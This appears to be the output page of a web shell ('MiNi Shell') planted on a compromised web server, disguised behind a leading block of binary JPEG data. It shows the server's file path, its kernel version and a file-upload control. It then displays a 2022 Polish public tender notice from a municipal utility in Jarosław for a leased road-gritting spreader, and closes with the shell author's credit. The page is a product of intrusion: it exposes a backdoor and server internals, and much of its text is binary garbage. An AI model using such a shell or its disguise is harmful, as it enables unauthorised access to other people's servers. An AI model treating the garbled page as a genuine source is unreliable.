JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220713/0025298601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa fabrycznie nowej posypywarki finansowanej w formie leasingu operacyjnego z opcją wykupu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej w Jarosławiu Sp. z o.o.</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">PGKiM w Jarosławiu Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650228435</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Przemyska nr 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jarosław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 166212560</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 166215297</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@pgkimjaroslaw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://pgkimjaroslaw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa fabrycznie nowej posypywarki finansowanej w formie leasingu operacyjnego z opcją wykupu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-eee39c5f-0295-11ed-8000-d680d39e541a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00252986</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.pgkimjaroslaw.pl/przetargi <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia i w konkursie, w tym składanie ofert, wniosków<br/>o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie<br/>dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków<br/>określonych w ustawie p.z.p., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki<br/>komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia<br/>18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/>2. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe,<br/>pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci<br/>elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf,<br/>.doc, .docx, .odt . Ofertę, a także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ składa się, pod<br/>rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.<br/>3. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują drogą elektroniczną:<br/>biuro@pgkimjaroslaw.pl .<br/>4. Wykonawca składa ofertę wraz z załącznikami, za pośrednictwem Formularza do złożenia, zmiany,<br/>wycofania oferty dostępnego na ePUAP https://epuap.gov.pl/wps/portal i udostępnionego również na<br/>miniPortalu https://miniportal.uzp.gov.pl/<br/>5. Wykonawca musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp<br/>do formularzy: złożenia, zmiany, wycofania oferty oraz do formularza do komunikacji.<br/>6. Wymagania techniczne i organizacyjne wysyłania i odbierania plików przekazywanych przy użyciu<br/>ePUAP oraz miniPortalu:<br/>1) specyfikacja połączenia - Formularze udostępnione są za pomocą protokołu TLS 1.2,<br/>2) format danych oraz kodowanie miniPortal - Formularze dostępne są w formacieHTML z kodowaniem<br/>UTF-8,<br/>3) oznaczenia czasu odbioru danych – miniPortal - wszelkie operacje opierają się o czas serwera i<br/>dane zapisywane są z dokładnością co do setnej części sekundy,<br/>4) integracja z systemem ePUAP jest wykonana z wykorzystaniem standardowego mechanizmu<br/>ePUAP. W przypadku Wykonawcy wysyłającego wniosek do Zamawiającego, Elektroniczna Skrzynka<br/>Podawcza (ESP) Zamawiającego automatycznie generuje rodzaj Urzędowego Poświadczenia Odbioru<br/>czyli Urzędowe Poświadczenie Przedłożenia (UPP), które jest powiązane z wysyłanym dokumentem.<br/>W UPP w sekcji „Dane poświadczenia” jest zawarta informacja o dacie przekazania.<br/>5) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia,<br/>zmiany, wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>6) Za datę przekazania oferty przyjmuje się datę jej przekazania na ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Oświadczenie o wypełnieniu obowiązku informacyjnego<br/>przewidziane w art. 13 lub art. 14 RODO wobec osób fizycznych, od których dane osobowe<br/>bezpośrednio lub pośrednio pozyskałem w celu ubiegania się o udzielenie zamówienia publicznego w<br/>niniejszym postępowaniu</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PGKiM-DAP 26.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa fabrycznie nowej posypywarki finansowanej w formie leasingu operacyjnego z opcją wykupu <br/>Wymagane parametry techniczne i cechy konstrukcyjne:<br/><br/>- pojemność zbiornika posypywarki min.6m3<br/>- konstrukcja wykonana ze stali nierdzewnej zabezpieczona antykorozyjnie<br/>- silnik spalinowy umieszczony z boku posypywarki, zasłonięty blachą maskująco-wygłuszającą<br/>- napęd elementów roboczych poprzez własny układ hydrauliczny zasilany silnikiem spalinowym<br/>- wyposażenie w podajnik taśmowy o szerokości min. 500mm <br/>- konstrukcja przystosowana do montażu na nośniku hakowym przeznaczona do posypywania różnymi środkami uszorstniającymi ze szczególnym uwzględnieniem piasku oraz mieszanek solno-piaskowych<br/>- napędzana niezależnym, silnikiem wysokoprężnym o mocy min 15 KM <br/>- wlew paliwa usytuowany z tyłu posypywarki umożliwiający łatwy dostęp podczas tankowania posypywarki znajdującej się na nośniku<br/>- wyposażenie we wziernik poziomu paliwa umieszczony na tylnej ścianie posypywarki w sposób umożliwiający łatwy odczyt poziomu paliwa<br/>- elektroniczny system sterowania za pomocą pulpitu sterowniczego w kabinie pojazdu: włączanie/wyłączanie wszystkich funkcji sterowania na pulpicie<br/>•	regulacja szerokości posypywania w zakresie 3-10m<br/>•	regulacja asymetrii posypywania, siłownik w obudowie z tworzywa sztucznego, odporny na działanie trudnych warunków zewnętrznych,<br/>•	regulacja gęstości posypywania w zakresie 5-35g/m2 dla soli oraz 50-400g/m2 dla mieszanek<br/>automatyczne dozowanie zadanej wartości rozsypywanego materiału do prędkości pojazdu,<br/>możliwość odczytu podstawowych danych pracy posypywarki<br/>•	załączanie sygnalizacji ostrzegawczej i reflektora pracy nocnej,<br/><br/>- talerz rozsypujący oraz łopatki ze stali nierdzewnej, łopatki wymienne rozłączne (śruby), wysokość kolumny talerza regulowana,<br/>- wyposażenie w drabinkę,<br/>diodowy reflektor roboczy oraz diodowa lampa ostrzegawcza w kolorze pomarańczowym<br/>- krata nasypowa dwudzielna spełniająca funkcję zabezpieczające przed przedostawaniem się materiału o nadmiernych gabarytach oraz zapewniająca pełne bezpieczeństwo operatora. Prześwit oczek min 50mm<br/>- pokrowiec ochronny (zamocowany na specjalnych stelażach) wykonany z wysokogatunkowego polietylenu zabezpieczający materiał rozsypywany przed działaniem czynników zewnętrznych <br/>z możliwością szybkiego i łatwego zakrywania i odkrywania bez konieczności wchodzenia na urządzenie,<br/>- montaż elektryczny z wykonaniem gniazda łącznego na kabinie – przepinka<br/>- międzyrama – modyfikacja własnej ramy zamawiającego<br/><br/>Wyposażenie dodatkowe:<br/>- drukarka termiczna<br/>Gwarancja na całość wyrobu nie krótsza niż 24 miesiące wraz przeglądami w okresie gwarancji zgodnie z zaleceniami producenta podwozia i zabudowy oraz materiałami eksploatacyjnymi<br/>2) Homologacja <br/>3) Przeglądy zabudowy wykonywane na placu Zamawiającego na bazie technicznej adres: <br/>Zakład Oczyszczania Miasta, siedziba zakładu: 37-500 Jarosław, Makowisko 163<br/><br/>Sprzęt musi być dostarczony do miejsca wskazanego przez zamawiającego, przez wykonawcę zamówienia i na jego koszt.<br/><br/>7) Warunki leasingu operacyjnego <br/>Umowa leasingu operacyjnego może zostać zawarta na standardowym wzorze umowy stosowanej przez Wykonawcę z zastrzeżeniem następujących postanowień: <br/>1) Okres leasingu: 48 miesięcy. <br/>Opłata inicjalna – wstępna w wysokości 10% wartości przedmiotu leasingu netto <br/>3) Wartość końcowa wykupu przedmiotu leasingu przez Zamawiającego w wysokości 1% wartości przedmiotu leasingu netto <br/>4) Opłata manipulacyjna – 0% <br/>5) Liczba rat leasingowych: 47 <br/>6) Oprocentowanie leasingu będzie zmienne w całym okresie leasingu oparte na stopie procentowej rynku międzybankowego WIBOR 1M. <br/>7) Raty leasingowe uiszczane są w terminach comiesięcznych począwszy od miesiąca następującego po odbiorze pojazdu. Zamawiający zobowiązany jest do uiszczania rat leasingowych na podstawie harmonogramu finansowego będącego integralną częścią umowy leasingowej. <br/>8) Własności przedmiotu leasingu przejdzie z mocy Umowy na Zamawiającego jako korzystającego po zakończeniu okresu leasingu i uregulowaniu wszystkich rat leasingowych zgodnie z Umową oraz zapłacie przez Zamawiającego ceny wykupu o której mowa w pkt. 3) powyżej. <br/>9) Przedmiot leasingu podlega ubezpieczeniu przez Zamawiającego i na jego koszt przez cały okres obowiązywania umowy, w firmie ubezpieczeniowej wybranej przez Zamawiającego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144420-8 - Pojazdy do rozrzucania soli</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34144440-4 - Piaskarki</p> <p class="mb-0">66114000-2 - Usługi leasingu finansowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-10-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze spośród nieodrzuconych ofert jako<br/>ofertę najkorzystniejszą z najwyższą liczbą punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> opis oferowanej posypywarki . Z opisu winno wynikać, iż oferowany sprzęt spełnia wszelkie wymagania zamawiającego określone w Szczegółowym Opisie Przedmiotu zamówienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli wykonawca nie złożył podmiotowych i przedmiotowych środków dowodowych lub złożone podmiotowe i przedmiotowe środki dowodowe są niekompletne, zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie . <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które /dostawy/usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zmiana postanowień umowy w stosunku do treści oferty jest możliwa poprzez: <br/>a.	zmianę terminu wykonania przedmiotu Umowy, w przypadku niemożności zachowania pierwotnie ustalonych w Umowie terminów z przyczyn, których nie można było przewidzieć w chwili zawierania Umowy, niezawinionych przez żadną ze Stron, <br/>b.	zmianę sposobu wykonania Umowy poprzez dostarczenie przez Wykonawcę zamiast Pojazdu wskazanego w Ofercie innego Pojazdu, spełniającego wszystkie wymagania Zamawiającego określone w SWZ, o parametrach i właściwościach użytkowych nie gorszych niż pojazd zaoferowany w Ofercie; warunkiem wprowadzenia takiej zmiany jest wycofanie lub wstrzymanie produkcji Pojazdu pierwotnie zaoferowanego w Ofercie, zmiana taka nie może spowodować zwiększenia Wynagrodzenia, <br/>c.	zmianę sposobu wykonania Umowy poprzez dostarczenie przez Wykonawcę zamiast Pojazdu wskazanego w Ofercie innego Pojazdu, spełniającego wszystkie wymagania Zamawiającego określone w SWZ, o parametrach i właściwościach użytkowych nie gorszych niż pojazd zaoferowany w Ofercie; w przypadku pojawienia się pojazdów nowszej generacji, o korzystniejszych dla Zamawiającego właściwościach użytkowych lub eksploatacyjnych, zmiana taka nie może spowodować zwiększenia Wynagrodzenia. <br/>d.	zmiany ustawowej wysokości stawki podatku od towaru i usług (VAT). <br/>4.	Zmiany umowy mogą nastąpić nie wcześniej niż po wcześniejszym zaakceptowaniu przez strony umowy, stosownego wniosku, zawierającego propozycję nowych warunków umownych, a jeżeli wprowadzona zmiana dotyczy wynagrodzenia wykonawcy – również szczegółowe wyliczenie wynagrodzenia należnego Wykonawcy po dokonaniu zmiany. <br/>5.	Zmiany umowy wymagają pisemnego aneksu do umowy, pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-22 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-22 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com